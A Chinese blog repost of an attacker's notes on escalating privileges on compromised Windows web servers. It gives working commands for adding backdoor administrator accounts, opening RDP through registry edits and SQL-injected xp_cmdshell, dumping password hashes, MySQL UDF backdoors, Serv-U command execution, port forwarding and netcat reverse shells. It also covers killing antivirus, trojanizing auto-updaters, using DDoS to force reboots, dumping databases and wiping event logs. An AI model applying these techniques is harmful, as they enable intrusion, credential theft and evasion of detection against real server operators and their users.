别人的提权笔记,个人觉的很不错值得收藏 - 小胖资源博客

别人的提权笔记,个人觉的很不错值得收藏

作者: 小胖

全网最全的网络资源分享网站

手机扫码查看

标签:

特别声明:文章多为网络转载,资源使用一般不提供任何帮助,特殊资源除外,如有侵权请联系!

浪尖物联卡

【 web提权 】

1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user

2.当提权胜利,3389没开的状况下,上传开3389的vps没胜利时,试试上传rootkit.asp 用刚提权的用户登录进去就是system权限,再试试普通就能够了。

3.cmd回绝访问的话就本人上传一个cmd.exe 本人上传的后缀是不限制后缀的,cmd.exe/cmd.com/cmd.txt 都能够。

4.cmd命令:systeminfo,看看有没有KB952004、KB956572、KB970483这三个补丁,假如没有,第一个是pr提权,第二个是巴西烤肉提权,第三个是iis6.0提权。

6.c:\windows\temp\cookies\ 这个目录

7.找sa密码或是root密码,直接应用大马的文件搜索功用直接搜索,超便当!

8.cmd执行exp没回显的处理办法:com途径那里输入exp途径C:\RECYCLER\pr.exe,命令那里清空(包括/c )输入”net user jianmei daxia /add”

9.增加用户并提升为管理员权限之后,假如衔接不上3389,上传rootkit.asp脚本,访问会提示登录,用提权胜利的账号密码登录进去就能够具有管理员权限了。

10.有时变态监控不让添加用户,能够尝试抓管理哈希值,上传“PwDump7 破解当前管理密码(hash值)”,俩个都上传,执行PwDump7.exe就能够了,之后到网站去解密即可。

11.有时增加不上用户,有可能是密码过于简单或是过于复杂,还有就是杀软的拦截,命令 tasklist 查看进程

12.其实星外提权只需一个可执行的文件即可,先运转一遍cmd,之后把星外ee.exe命名为log.csv 就能够执行了。

13.用wt.asp扫出来的目录,其中红色的文件能够交换成exp,执行命令时cmd那里输入交换的文件途径,下面清空双引号加增加用户的命令。

14.提权很无法的时分,能够试试TV远控,通杀内外网,穿透防火墙,很强大的。

15.当可读可写目录存在空格的时分,会呈现这样的状况:’C:\Documents’ 不是内部或外部命令,也不是可运转的程序 或批处置文件。处理方法是应用菜刀的交互shell切换到exp途径,如:Cd C:\Documents and Settings\All Users\Application Data\Microsoft 目录 然后再执行exp或者cmd,就不会存在上面的状况了,aspshell普通是无法跳转目录的~

16.有时分能够添加用户,但是添加不到管理组,有可能是administrators改名了,net user administrator 看下本地组成员,*administrators

17.进入效劳器,能够继续内网浸透 这个时分能够尝试翻开路由器 默许帐号密码 admin admin

18.有的cmd执行很变态,asp马里,cmd途径填上面,下面填:”"c:\xxx\exp.exe “whoami” 记得前面加两个双引号,不行后面也两个,不行就把exp的途径放在cmd那里,下面不变。

19.普通增加不上用户,或是想添加增加用户的vbs,bat,远控小马到效劳器的启动项里,用“直接使效劳器蓝屏重启的东东”这个工具能够完成,

20.执行PwDump7.exe抓哈希值的时分,倡议重定向结果到保管为1.txt /c c:\windows\temp\cookies\PwDump7.exe >1.txt

21.菜刀执行的技巧,上传cmd到可执行目录,右击cmd 虚拟终端,help 然后setp c:\windows\temp\cmd.exe 设置终端途径为:c:\windows\temp\cmd.exe

22.当不支持aspx,或是支持但跨不了目录的时分,能够上传一个读iis的vps,执行命令列出一切网站目录,找到主站的目录就能够跨过去了。 上传cscript.exe到可执行目录,接着上传iispwd.vbs到网站根目录,cmd命令/c “c:\windows\temp\cookies\cscript.exe” d:\web\iispwd.vbs

23.如何区分效劳器是不是内网? 192.168.x.x 172.16.x.x 10.x.x.x

(( dos命令大全 ))

查看版本:ver

查看权限:whoami

查看配置:systeminfo

查看用户:net user

查看进程:tasklist

查看正在运转的效劳:tasklist /svc

查看开放的一切端口:netstat -ano

查询管理用户名:query user

查看搭建环境:ftp 127.0.0.1

查看指定效劳的途径:sc qc Mysql

添加一个用户:net user jianmei daxia.asd /add

提升到管理权限:net localgroup administrators jianmei /add

添加用户并提升权限:net user jianmei daxia.asd /add & net localgroup administrators jianmei /add

查看制定用户信息:net user jianmei

查看一切管理权限的用户:net localgroup administrators

参加远程桌面用户组:net localgroup “Remote Desktop Users” jianmei /add

打破最大衔接数:mstsc /admin /v:127.0.0.1

删除用户:net user jianmei /del

删除管理员账户:net user administrator daxia.asd

更改系统登陆密码:net password daxia.asd

激活GUEST用户:net user guest /active:yes

开启TELNET效劳:net start telnet

关闭麦咖啡:net stop “McAfee McShield”

关闭防火墙:net stop sharedaccess

查看当前目录的一切文件:dir c:\windows\

查看制定文件的内容:type c:\windows\1.asp

把cmd.exe复制到c:\windows的temp目录下并命名为cmd.txt:copy c:\windows\temp\cookies\cmd.exe c:\windows\temp\cmd.txt

开3389端口的命令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

查看补丁:dir c:\windows\>a.txt&(for %i in (KB952004.log KB956572.log KB2393802.log KB2503665.log KB2592799.log KB2621440.log KB2160329.log KB970483.log KB2124261.log KB977165.log KB958644.log) do @type a.txt|@find /i “%i”||@echo %i Not Installed!)&del /f /q /a a.txt

(( SQL语句直接开启3389 ))

3389登陆关键注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections

其中键值DenyTSConnections 直接控制着3389的开启和关闭,当该键值为0表示3389开启,1则表示关闭。

而MSSQL的xp_regwrite的存储过程能够对注册停止修正,我们运用这点就能够简单的修正DenyTSConnections键值,从而控制3389的关闭和开启。

开启3389的SQL语句: syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\Terminal Server’,'fDenyTSConnections’,'REG_DWORD’,0;–

关闭3389的SQL语句: syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\Terminal Server’,'fDenyTSConnections’,'REG_DWORD’,1;–

2003能够完成一句话开3389: reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v PortNumber /t REG_DWORD /d 80 /f

(( 常见杀软 ))

360tray.exe 360实时维护

ZhuDongFangYu.exe 360主动防御

KSafeTray.exe 金山卫士 McAfee McShield.exe 麦咖啡

SafeDogUpdateCenter.exe 效劳器平安狗

(( windows提权中敏感目录和敏感注册表的应用 ))

敏感目录 目录权限 提权用处

C:\Program Files\ 默许用户组users对该目录具有查看权 能够查看效劳器装置的应用软件 C:\Documents and Settings\All Users\「开端」菜单\程序 Everyone具有查看权限 寄存快捷方式,能够下载文件,属性查看装置途径 C:\Documents and Settings\All Users\Documents Everyone完整控制权限 上传执行cmd及exp C:\windows\system32\inetsrv\ Everyone完整控制权限 上传执行cmd及exp C:\windows\my.iniC:\Program Files\MySQL\MySQL Server 5.0\my.ini 默许用户组users具有查看权限 装置mysql时会将root密码写入该文件 C:\windows\system32\ 默许用户组users具有查看权限 Shift后门普通是在该文件夹,能够下载后门破解密码 C:\Documents and Settings\All Users\「开端」菜单\程序\启动 Everyone具有查看权限 能够尝试向该目录写入vbs或bat,效劳重视启后运转。 C:\RECYCLER\D:\RECYCLER\ Everyone完整控制权限 回收站目录。常用于执行cmd及exp C:\Program Files\Microsoft SQL Server\ 默许用户组users对该目录具有查看权限 搜集mssql相关信息,有时分该目录也存在可执行权限 C:\Program Files\MySQL\ 默许用户组users对该目录具有查看权限 找到MYSQL目录中user.MYD里的root密码 C:\oraclexe\ 默许用户组users对该目录具有查看权限 能够尝试应用Oracle的默许账户提权 C:\WINDOWS\system32\config 默许用户组users对该目录具有查看权限 尝试下载sam文件停止破解提权 C:\Program Files\Geme6 FTP Server\Remote Admin\Remote.ini 默许用户组users对该目录具有查看权限 Remote.ini文件中寄存着G6FTP的密码 c:\Program Files\RhinoSoft.com\Serv-U\c:\Program Files\Serv-U\ 默许用户组users对该目录具有查看权限 ServUDaemon.ini 中存储了虚拟主机网站途径和密码 c:\windows\system32\inetsrv\MetaBase.xml 默许用户组users对该目录具有查看权限 IIS配置文件 C:tomcat5.0\conf\resin.conf 默许用户组users对该目录具有查看权限 Tomat寄存密码的位置 C:\ZKEYS\Setup.ini 默许用户组users对该目录具有查看权限 ZKEYS虚拟主机寄存密码的位置

(( 提权中的敏感注册表位置 ))

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\MSSQLServer\SuperSocketNetLib\Tcp Mssql端口 HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server DenyTSConnections 远程终端 值为0 即为开启 HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\ mssql的注册表位置 HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\ 华众主机注册表配置位置 HKEY_LOCAL_MACHINE\SOFTWARE\Cat Soft\Serv-U\Domains\1\UserList\ serv-u的用户及密码(su加密)位置 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\ WinStations\RDP-Tcp 在该注册表位置PortNumber的值即位3389端口值 HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers mysql管理工具Navicat的注册表位置,提权运用请谷歌 HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters Radmin的配置文件,提权中常将其导出停止停止掩盖提权 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtual Roots\ IIS注册表全版本走漏用户途径和FTP用户名破绽 HKEY_LOCAL_MACHINE\software\hzhost\config\Settings\mastersvrpass 华众主机在注册表中保管的mssql、mysql等密码 HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11 星外主机mssql的sa账号密码,双MD5加密 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtual Roots\ControlSet002 星外ftp的注册表位置,当然也包括ControlSet001、ControlSet003

(( wscript.shell的删除和恢复 ))

载wscript.shell对象,在cmd下或直接运转:regsvr32 /u %windir%\system32\WSHom.Ocx 卸载FSO对象,在cmd下或直接运转:regsvr32.exe /u %windir%\system32\scrrun.dll 卸载stream对象,在cmd下或直接运转:regsvr32 /s /u “C:\ProgramFiles\CommonFiles\System\ado\msado15.dll” 假如想恢复的话只需求去掉/U 即可重新再注册以上相关ASP组件,这样子就能够用了

(( 如何找到精确的终端衔接端口?))

在aspx大马里,点击“系统信息”第三个就是目前的3389端口

或是执行命令查看正在运转的效劳:tasklist /svc

找到:svchost.exe 1688 TermService

记住1688这个ID值,

查看开放的一切端口:netstat -ano

找到1688这个ID值所对应的端口就是3389目前的端口

(( iis6提权提示Can not find wmiprvse.exe的打破办法 ))

打破办法一:

在IIS环境下,假如权限做得不严厉,我们在aspx大马里面是有权限直接完毕wmiprvse.exe进程的,进程查看里面直接K掉

在完毕之后,它会再次运转,这时分的PID值的不一样的。这时分我们回来去运转exp,直接秒杀。

打破办法二:

虚拟主机,普通权限严厉限制的,是没权限完毕的,这时分我们能够思索配合其他溢收工具让效劳器强迫重启,比方“直接使效劳器蓝屏重启的东东”

以至能够暴力点,DDOS秒杀之,管理发现效劳器不通了首先肯定是以为效劳器死机,等他重启下效劳器(哪怕是IIS重启下)同样秒杀之。

(( 本地溢出提权 ))

计算机有个中央叫缓存区,程序的缓存区长度是被事前设定好的,假如用户输入的数据超越了这个缓存区的长度,那么这个程序就会溢出了.

缓存区溢出破绽主要是由于许多软件没有对缓存区检查而形成的.

应用一些现成的形成溢出破绽的exploit经过运转,把用户从users组或其它系统用户中提升到administrators组.

想要执行cmd命令,就要wscript.shell组建支持,或是支持aspx脚本也行,由于aspx脚本能调用.net组件来执行cmd的命令.

(( sa提权 ))

扫描开放的端口,1433开了就能够找sa密码提权,用大马里的搜索文件功用,sa密码普通在conn.asp config.asp web.config 这三个文件

也能够经过注册表找配置文件,看下支持aspx不,支持的话跨目录到别的站点上找,找到之后用aspshell自带的sql提权登录再执行命令创立用户即可。

aspx马提权执行命令有点不一样,点击数据库管理–选MSSQL–server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB–输入帐号密码衔接即可

增加一个用户:exec master.dbo.xp_cmdshell ‘net user jianmei daxia.asd /add’;– 提升为管理员:exec master.dbo.xp_cmdshell ‘net localgroup administrators jianmei /add’;–

PS:假如增加不上,阐明是xp_cmdshell组建没有,增加xp_cmdshell组建:Use master dbcc addextendedproc(‘xp_cmdshell’,'xplog70.dll’)

【 1433一句话开3389 】

Exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\Terminal Server’,'fDenyTSConnections’,'REG_DWORD’,0;–

(( root提权 ))

应用mysql提权的前提就是,效劳器装置了mysql,mysql的效劳没有降权,是默许装置以系统权限继承的(system权限). 并且取得了root的账号密码

如何判别一台windows效劳器上的mysql有没有降权? cmd命令net user 假如存在 mysql mssql这样用户或者相似的.通常就是它的mssql mysql效劳曾经被降权运转了

如何判别效劳器上能否开启了mysql效劳? 开了3306端口,有的管理员会把默许端口改掉.另一个判别办法就是网站能否支持php,普通支持的话都是用mysql数据库的.

如何查看root密码? 在mysql的装置目录下找到user.myd这个文件,root就藏在里面,普通是40位cmd加密,一些php网站装置的时分用的是root用户,在conn.asp config.asp这些文件里。 有时会显得很乱,这时就需求本人去组合,前17位在第一行能够找到,还有23位在第三行或是其他行,本人继续找。

能够直接用php脚本里“mysql执行”,或是上传个UDF.php,假如网站不支持PHP,能够去旁一个php的站,也能够把UDF.php上传到别的phpshell上也能够。

填入帐号密码之后,自然就是装置DLL了,点击“自动装置Mysql BackDoor” 显现导出跟创立函数胜利后,紧接着执行增加用户的命令即可。

留意:5.0版本以下(包括5.0的)默许c:\windows\系统目录就能够了,5.1版本以上的不能导出到系统目录下创立自定义函数,只能导出在mysql装置目录下的lib/plugin目录中

例如:D:/Program Files/MySQL/MySQL Server 5.1/lib/plugin/mysql.dll

假如密码看不见,或是组合不到40位,就本地装置一个mysql吧, 1、中止mysql效劳 2、交换下载下来的3个文件(user.MYI user.MYD user.frm) 3、cmd切换到bin目录下,进入mysql平安形式,cmd命令:mysqld-nt –skip-grant-tables 4、重新翻开一个cmd 切换到bin目录下,cmd命令:mysql -u root 版本不同有可能是:mysql -uroot -proot 5、最后查询一下就出来了select user,password from mysql.user;

(( serv-u提权 ))

这个文件里包含serv-u的md5密码:C:\Program Files\RhinoSoft.com\Serv-U\\ServUDaemon.ini

找到这个文件:ServUDaemon.ini 翻开找到:LocalSetupPassword=nqFCE64E0056362E8FCAF813094EC39BC2

再拿md5密文去解密,再用如今的密码登陆提权即可。

serv-u提权的前提是43958端口开了,且晓得帐号密码!

假如帐号密码默许,直接用shell里面的serv-u提权功用即可搞定,倡议用aspx马、php马去提权,由于能够看回显。

530阐明密碼不是默许的,回显330阐明胜利,900阐明密码是默许的……………..

在程序里找个快捷方式,或是相关的文件停止下载到本地,再查看文件的属性,就能够找到serv-u的装置目录了。

目录有修正权限之serv-u提权:

找到serv-u的目录,再找到用户的配置文件ServUDaemon.ini,直接增加一个用户代码,保管!

接着本地cmd命令:ftp 效劳器ip

回车,输入帐号密码再回车………………….

接着先试试普通的cmd命令提权,不行的话就运用ftp提权的命令:

Quote site exec net user jianmei daxia /add 增加一个用户

Quote site exec net localgroup administrators jianmei /add 提升到管理员权限

200 EXEC command successful (TID=33). 执行胜利的回显信息

Maintenance=System 权限类型多加一行指定新加帐号为系统管理员

ReloadSettings=True 在修正ini文件后需参加此项,这时serv-u会自动刷新配置文件并生效

(( 端口转发 ))

什么状况下合适转发端口?

1.效劳器是内网,我们无法衔接。 2.效劳器上有防火墙,阻断我们的衔接。

转发端口的前提,我们是外网或是有外网效劳器。

找个可读可写目录上传lcx.exe

本地cmd命令:lcx.exe -listen 1988 4567 (监听本地1988端口并转发到4567端口)

接着shell命令:/c c:\windows\temp\cookies\lcx.exe -slave 本机ip 1988 效劳器ip 3389 (把效劳器3389端口转发到本地4567端口)

之后本地衔接:127.0.0.1:4567 (假如不想加上:4567的话,本地执行命令的时分,把4567换成3389来执行就行了)

以上是本机外网状况下操作,接着说下在外网效劳器里如何操作:

上传lxc.exe cmd.exe到效劳器且同一目录,执行cmd.exe命令:lcx.exe -listen 1988 4567

接着在aspxshell里点击端口映射,远程ip改为站点的ip,远端口程填1988,点击映射端口,接着在效劳器里衔接127.0.0.1:4567就能够了。

(( nc反弹提权 ))

当能够执行net user,但是不能树立用户时,就能够用NC反弹提权试下,特别是内网效劳器,最好用NC反弹提权。

不过这种办法, 只需对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的一切端口,那么这种办法也失效了….

找个可读可写目录上传nc.exe cmd.exe

-l 监听本地入栈信息

-p port翻开本地端口

-t 以telnet方式应对入栈恳求

-e 程序重定向

本地cmd执行:nc -vv -l -p 52 停止反弹

接着在shell里执行命令:c:\windows\temp\nc.exe -vv 效劳器ip 999 -e c:\windows\temp\cmd.exe 最好是80或8080这样的端口,被防火墙拦截的几率小很多

执行胜利后本地cmd命令:cd/ (只是习气而已)

接着以telnet命令衔接效劳器:telnet 效劳器ip 999

回车呈现已选定效劳器的ip就阐明胜利了,接着权限比拟大了,尝试树立用户!

坏蛋: 本地cmd执行:nc -vv -l -p 52 停止反弹 c:\windows\temp\nc.exe -e c:\windows\temp\cmd.exe 效劳器ip 52

低调小飞: shell执行命令c:\windows\temp\nc.exe -l -p 110 -t -e c:\windows\temp\cmd.exe

普通这样的格式执行胜利率很小,不如直接在cmd那里输入:c:\windows\temp\nc.exe 命令这里输入:-vv 效劳器ip 999 -e c:\windows\temp\cmd.exe

这个技巧胜利率比上面那个大多了,不单单是nc能够这样,pr这些提权exp也是能够的。

(( 星外提权 ))

如何晓得是不是星外主机?

第一:网站物理途径存在“freehost” 第二:asp马里点击程序,存在“7i24虚拟主机管理平台”“星外主机”之类的文件夹

默许帐号:freehostrunat 默许密码:fa41328538d7be36e83ae91a78a1b16f!7

freehostrunat这个用户是装置星外时自动树立的,已属于administrators管理组,而且密码不需求解密,直接登录效劳器即可

星外常写目录:

C:\RECYCLER\ C:\windows\temp\ e:\recycler\ f:\recycler\ C:\php\PEAR\ C:\WINDOWS\7i24.com\FreeHost C:\php\dev C:\System Volume Information C:\7i24.com\serverdoctor\log\ C:\WINDOWS\Temp\ c:\windows\hchiblis.ibl C:\7i24.com\iissafe\log\ C:\7i24.com\LinkGate\log C:\Program Files\Thunder Network\Thunder7\ C:\Program Files\Thunder Network\Thunder\ C:\Program Files\Symantec AntiVirus\SAVRT\ c:\windows\DriverPacks\C\AM2 C:\Program Files\FlashFXP\ c:\Program Files\Microsoft SQL Server\90\Shared\ErrorDumps\ C:\Program Files\Zend\ZendOptimizer-3.3.0\ C:\Program Files\Common Files\ c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv c:\Program Files\360\360Safe\deepscan\Section\mutex.db c:\Program Files\Helicon\ISAPI_Rewrite3\error.log c:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log c:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf c:\Program Files\Common Files\Symantec Shared\Persist.bak c:\Program Files\Common Files\Symantec Shared\Validate.dat c:\Program Files\Common Files\Symantec Shared\Validate.dat C:\Program Files\Zend\ZendOptimizer-3.3.0\docs C:\Documents and Settings\All Users\DRM\ C:\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection C:\Documents and Settings\All Users\Application Data\360safe\softmgr\ C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\

ee提权法:

找个可读可写目录上传ee.exe

cmd命令:/c c:\windows\temp\cookies\ee.exe -i (获取星外帐号的id值,例如回显:FreeHost ID:724)

接着命令:/c c:\windows\temp\cookies\ee.exe -u 724 (获取星外的帐号密码)

vbs提权法:

找个可读可写目录上传cscript.exe iispwd.vbs

cmd命令:/c “c:\windows\temp\cookies\cscript.exe” c:\windows\temp\cookies\iispwd.vbs

意义是读取iis,这样一来,不但能够获取星外的帐号密码,还能够看到同效劳器上的一切站点的目录。

可行思绪大全:

经测试以下目录中的文件权限均为everyone,能够修正,能够上传同文件名交换,删除,最重要的是还能够执行:

360杀毒db文件交换: c:\Program Files\360\360SD\deepscan\Section\mutex.db c:\Program Files\360\360Safe\deepscan\Section\mutex.db C:\Program Files\360\360Safe\AntiSection\mutex.db

IISrewrite3 文件交换: C:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log C:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf C:\Program Files\Helicon\ISAPI_Rewrite3\error.log

诺顿杀毒文件交换: c:\Program Files\Common Files\Symantec Shared\Persist.bak c:\Program Files\Common Files\Symantec Shared\Validate.dat c:\Program Files\Common Files\Symantec Shared\Persist.Dat

一流过滤相关目录及文件: C:\7i24.com\iissafe\log\startandiischeck.txt C:\7i24.com\iissafe\log\scanlog.htm

其他: Zend文件交换:C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll 华盾文件交换:C:\WINDOWS\hchiblis.ibl Flash文件交换:C:\WINDOWS\system32\Macromed\Flash\Flash10q.ocx DU Meter流量统计信息日志文件交换:c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv

(( 360提权 ))

找个可读可写目录上传360.exe

cmd命令:/c c:\windows\temp\cookies\360.exe

会提示3段英文: 360 Antivirus Privilege Escalation Exploit By friddy 2010.2.2 You will get a Shift5 door! Shift5 Backdoor created! 这是胜利的征兆,接着衔接效劳器连按5下shift键,将弹出任务管理器,点击新建任务:explorer.exe 会呈现桌面,接下来大家都会弄了……

(( 搜狗提权 ))

搜狗的目录默许是可读可写的,搜狗每隔一段时间就会自动晋级,而晋级的文件是pinyinup.exe

我们只需把这个文件交换为本人的远控木马,或是添加账户的批处置,等搜狗晋级的时分,就能够达成我们的目的了。

(( 华众虚拟主机提权 ))

就经历来说,普通溢出提权对虚拟主机是无果的,而且华众又没有星外那么明显的破绽。

所以华众提权关键之处就是搜集信息,主要注册表位置:

HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\ HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mysqlpass root密码 HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mssqlpss sa 密码

c:\windows\temp 下有hzhost主机留下的ftp登陆记载有用户名和密码

以上信息配合hzhosts华众虚拟主机系统6.x 破解数据库密码工具运用

百度搜索:hzhosts华众虚拟主机系统6.x 破解数据库密码工具

(( N点虚拟主机 ))

N点虚拟主机管理系统默许数据库地址为:\host_date\#host # date#.mdb

rl直接输入不行 这里我们交换下 #=%23 空格=%20

修正后的下载地址为/host_date/%23host%20%23%20date%23196.mdb

N点数据库下载之后找到sitehost表 FTPuser&FTPpass 值 FTPpass是N点加密数据然后用N点解密工具解密得到FTP密码

N点默许装置途径C:\Program Files\NpointSoft\npointhost\web\ D:\Program Files\NpointSoft\npointhost\web\ 默许权限可读。遇到对方所用虚拟主机是N点时分 能够思索 读取该文件夹下载数据库

N点解密工具代码 <% set iishost=server.CreateObject(“npoint.host”)

x=iishost.Eduserpassword(“FTPpass值”,0)

response.write x %>

本地搭建N点环境在N点目录翻开访问即可。得到密码减去后10位字符即为 N点的虚拟主机管理密码。 然后需求在管理系统登陆确认下 在hostcs 表 找到 Hostip 或者hostdomain 普通默许是 Hostip=127.0.0.1 hostdomain=www.npointhost.com 这里能够不论 由于 这里不修正的话就是效劳器默许ip地址sitehost 表的host_domain就是绑定的域名 直接查下IP地址即可 我们批量的话 扫描的地址即可。 管理系统地址即为IP地址 选择虚拟主机 登录即可 接下来传shell大家应该都会了。 接下来说提权 hostcs表存有sa root账户的密码 解密办法一样。默许都是 解密结果123456 还有就是在adminlogo 存在N点系统管理密码 30位的cfs加密能够在//www.md5.com.cn/cfs 碰撞下试试 或者用asm的工具破解下我的运气不好没胜利过 3057C0DB854C878E72756088058775 这个是默许admin的密码

(( 脱库 ))

asp 程序的网站普通不是access就是msssql,access数据库脱裤很简单,直接下载数据库即可,mssql数据库能够用shell自带的脱裤功 能,找到数据库的衔接信息,普通在web.config.asp里,然后衔接一下SA,找到会员表(UserInfo)就能够了。

PHP程序就是mysql了,找到root帐号密码,用PHP大马本人带链接功用衔接一下,也本人本人上传PHP脱裤脚本,之后找到目的数据库(数据库名),再找到会员表menber停止脱裤即可。

(( 效劳器 ))

命令提示符已被系统管理员停用? 处理办法:运转→gpedit.msc→用户配置→管理模板→系统,在右侧找到”阻止命令提示符”, 然后双击一下,在”设置”里面选中”未配置” ,最后点击”肯定”。

如何判别效劳器的类型? 处理办法:直接ping效劳器ip,看回显信息停止判别

TTL=32 9X/ME

TTL=64 linux

TTL=128 2000X/XP

TTL=255 UNIX

为什么有时3389开放却不能衔接? 缘由剖析:有时分是由于防火墙,把3389转发到其他端口就能够衔接了,有的转发后仍然是衔接不上,那是由于管理员在TCP/IP里设置的端口限制 处理办法:我们需求把端口转为TCP/IP里设置的只允许衔接的端口其中一个就能够了,更好的方法是取消端口限制。

最简单的往效劳器上传东西办法是什么? 本机翻开“HFS网络文件效劳器”这款工具,把需求上传的工具直接拖进左边第一个框内,复制上面的地址,到效劳器里的阅读器访问,就能够下载了

限 制“命令提示符”的运转权限? 我的电脑(右键)–资源管理器中–点击“工具”按钮,选择“文件夹选项”,切换到“查看”标签,去掉“运用简单文件共享(引荐)”前面的钩,这一步是为了 让文件的属性菜单中显现“平安”标签,然后进入“c:\windows\system32\”,找到“cmd.exe”,点右键选择“属性”,切换到“安 全”标签,将其中“组或用户称号”中除了管理员外的一切用户都删除,完成后点“肯定”这样当普通用户想运转“命令提示符”的时分将会呈现“回绝访问”的警 告框。

如何更改windows2003最大衔接数? windows2003中的远程桌面功用十分便当,但是初始设置只允许2个用户同时登陆,有些时分由于我在公司衔接登陆后断开,同事在家里用其他用户登陆 后断开,当我再停止衔接的时分,总是报错“终端效劳超越最大衔接数”这时分我和同事都不能登陆,经过以下办法来增加衔接数,运 行:services.msc,启用license logging,别忘了添加终了后再关闭 License Logging 翻开win2k3的控制面板中的“受权”,点“添加答应”输入要改的衔接数

如何肃清效劳器里的IP记载日志? 1.我的电脑右键管理–事情查看器–平安性–右键肃清一切事情 2.翻开我的电脑–C盘–WINDOWS–system32–config–AppEvent.Evt属性–平安–全部都回绝 3.Klaklog.evt属性–平安–全部都回绝–SecEvent.Tvt属性–平安–全部都回绝

本文最后更新于2015-6-1,已超过 1 年没有更新,如果文章内容或图片资源失效,请留言反馈,我们会及时处理,谢谢!
分享到:
打赏
未经允许不得转载:

作者: 小胖, 转载或复制请以 超链接形式 并注明出处 小胖资源博客
原文地址: 《别人的提权笔记,个人觉的很不错值得收藏》 发布于2015-6-1

评论

  1. #1
    尼龙树脂管 游客 Lv.1

    好文章,内容气势磅礴.禁止此消息:nolinkok回复了163.com

切换注册

登录

您也可以使用第三方帐号快捷登录

切换登录

注册

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏